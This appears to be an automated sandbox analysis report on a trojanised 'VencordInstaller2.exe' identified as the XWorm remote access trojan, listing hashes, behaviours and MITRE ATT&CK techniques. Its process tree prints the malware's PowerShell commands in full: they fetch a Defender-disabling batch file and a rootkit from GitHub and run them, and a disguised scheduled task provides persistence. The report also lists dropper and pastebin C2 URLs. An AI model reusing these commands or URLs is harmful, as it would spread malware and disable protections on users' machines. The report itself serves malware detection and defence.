Overview

overview

10

Static

static

3

VencordInstaller2.exe

windows7-x64

10

VencordInstaller2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    06/03/2025, 17:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    VencordInstaller2.exe

  • Size

    9.9MB

  • MD5

    c374d1675742dec803bc013c5069711b

  • SHA1

    ce53bdc502f1b9dfe6721e9fe3853029d31b8650

  • SHA256

    3293c4ae19d9c0fe95f15a8f65c08cc8d47d47d0a765ac024b5d5db0d2de9ed2

  • SHA512

    77d69bb193808b81038e9c4ad14920dc1e87ffb21a102b6a3bbe0876581275d77bfe3c9466aa9b8c903bdeca3b90911eb5edfed912597ec76cb4e03a17698044

  • SSDEEP

    196608:J95OFJg0DC/xTYt34Z+UWNhwiH0mQoAqOPmhMxA4jZzbLNNNj/ztmU:X5OFJxOBdIUWNKiH0NzqO9xAKbNj/ztF

Score
10/10
xwormdefense_evasiondiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes
  • Install_directory

    %port%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/J42c6s7r

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 40 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\VencordInstaller2.exe
    "C:\Users\Admin\AppData\Local\Temp\VencordInstaller2.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAdABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAZAB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAegBrACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1396
    • C:\Windows\Credential Guard & VBS Key Isolation.exe
      "C:\Windows\Credential Guard & VBS Key Isolation.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2840
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Credential Guard & VBS Key Isolation" /tr "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2660
    • C:\Users\Admin\AppData\Local\VencordInstaller (1).exe
      "C:\Users\Admin\AppData\Local\VencordInstaller (1).exe"
      2⤵
      • Executes dropped EXE
      PID:2800
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {91706C2F-587A-42E1-A48F-1128C9D44E1D} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
    1⤵
      PID:2972

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Modify Registry

    1
    T1112

    Obfuscated Files or Information

    1
    T1027

    Command Obfuscation

    1
    T1027.010

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Lateral Movement

    Collection

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S4TNITZRTIMIH8TFV15B.temp
      Filesize

      7KB

      MD5

      c4d59650ce027530ce036e31662de552

      SHA1

      62de9459aa112b9b9246044baa60664a9a564608

      SHA256

      bc2feebe957db9b77201310ed4e0c9900293b2e60b9cd762846440a37befc098

      SHA512

      e2431899e6fd53511edc67b9eaaf067b05b96f0206963a58882f0a7d8323191c8021c4ef1c6733a478501db784f6eac0da6f5d15e210bd69c9cbc7a2b800df81

      Download Submit

    • C:\Windows\Credential Guard & VBS Key Isolation.exe
      Filesize

      55KB

      MD5

      dac20ddb2cfb3cb89ce5bcd907c796df

      SHA1

      84ec40d9a683ed62a25f8e1e570b0a2ee3987af0

      SHA256

      9a727d5cfc4c67cb0d3c0f8195087042fd04b83bb29cbe0c0439a4094a2adfc7

      SHA512

      5a3199f76bc18eb20a1e9e7d0bdbadbff3deaa06ec00b3aee33360f1497cc22ae0bc1a125aeaadcef1647c5f03cb386bfbc62375ca5e70ac57c01168043c8762

      Download Submit

    • \Users\Admin\AppData\Local\VencordInstaller (1).exe
      Filesize

      9.9MB

      MD5

      1b8ee61ddcfd1d425821d76ea54ca829

      SHA1

      f8daf2bea3d4a6bfc99455d69c3754054de3baa5

      SHA256

      dc0826657a005009f43bdc3a0933d08352f8b22b2b9b961697a2db6e9913e871

      SHA512

      75ba16ddc75564e84f5d248326908065942ad50631ec30d7952069caee15b8c5411a8802d25d38e9d80e042f1dde97a0326f4ab4f1c90f8e4b81396ca69c229a

      Download Submit

    • memory/2800-13-0x000000013FCB0000-0x0000000140F29000-memory.dmp

      Filesize

      18.5MB

      Download

    • memory/2840-18-0x000000001B320000-0x000000001B602000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2840-19-0x00000000024E0000-0x00000000024E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2860-9-0x00000000000F0000-0x0000000000104000-memory.dmp

      Filesize

      80KB

      Download